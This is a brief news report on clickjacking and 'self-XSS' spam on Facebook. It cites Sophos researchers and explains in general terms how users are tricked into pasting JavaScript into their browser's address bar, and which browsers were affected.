According to Graham Cluley of the antivirus firm Sophos, attackers are using “clickjacking” to insert malicious code into a user’s browser. When a user goes to what seems like a normal website and clicks on a button, the clickjacking code covers the actual button with an invisible layer. Most users do not even know they have been jacked.
Facebook representatives announced Tuesday that they had identified the methods the hackers were using to exploit Facebook pages and called it a “self-XSS browser vulnerability”. XSS, which stands for cross-site-scripting, usually takes advantage of vulnerabilities in software to insert malware, or even take control of the unsuspecting server or PC. In this case, the self-XSS may bait the user with promises of free giveaways or “exclusive” videos that they cannot resist clicking.
According to Sophos, the exploit requires the user to copy and paste a Javascript code into the browser’s address bar, an exploit which Google Chrome and Mozilla Firefox had already fixed. Sophos testers were able to easily execute javascript code from the Internet Explorer 8 and 9 address bar, but Facebook did not specify which browsers were affected by the spamming.
Facebook reportedly took steps to prevent self-XSS attacks after the Bin Laden spam that hit the social network’s news feeds last spring. Now it appears those security measures were not enough.